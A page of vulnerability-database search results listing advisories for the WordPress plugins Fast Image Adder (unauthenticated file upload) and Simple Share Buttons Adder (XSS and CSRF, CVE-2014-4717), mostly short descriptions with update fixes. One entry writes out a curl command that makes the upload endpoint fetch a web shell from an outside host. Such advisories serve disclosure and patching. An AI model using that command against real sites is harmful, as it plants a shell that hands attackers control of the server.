52 matches found
WordPress Fast Image Adder Plugin <= 1.1 - Remote File Upload
This plugin is prone to a remote file upload vulnerability, because the fast-image-adder-uploader.php file doesn't check if a user is authorized to upload files. It creates a random file name, but reports the name back to the user. Solution: Update the plugin...
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...
Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)
A reflected XSS in "Simple Share Buttons Adder" before version 6.0.1 led to a reflected cross-site scripting vulnerability on all pages where the "Simple Share Buttons Adder" was added, usually all blog posts. Exploitation required that the browser did not encode the parameters sent to the server...
CVE-2014-4717
Multiple cross-site request forgery (CSRF) vulnerabilities in the Simple Share Buttons Adder plugin before 4.5 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) ssba_share_text parameter in a save...
Cross site request forgery (csrf)
Multiple cross-site request forgery (CSRF) vulnerabilities in the Simple Share Buttons Adder plugin before 4.5 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) ssba_share_text parameter in a save...
CVE-2014-4717
CVE-2014-4717 affects the WordPress plugin “Simple Share Buttons Adder” (versions prior to 4.5). The issue comprises multiple CSRF vulnerabilities that allow remote attackers to hijack administrator sessions and trigger stored XSS via the ssba_share_text parameter in a save action to wp-admin/opt...
WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities
No description provided by source. Details ================ Software: Simple Share Buttons Adder Version: 4.4 Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/ Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/ CVE: Awaiting...
WordPress Plugin Simple Share Buttons Adder 4.4 - Multiple Vulnerabilities
WordPress Plugin Simple Share Buttons Adder 4.4 - Multiple Vulnerabilities Details ================ Software: Simple Share Buttons Adder Version: 4.4 Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/ Advisory report:...
WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities
Simple Share Buttons Adder plugin is prone to multiple vulnerabilities (CSRF and XSS) that allow an attacker to convince an admin to visit a link of their choosing. Solution: Update to version 4.5...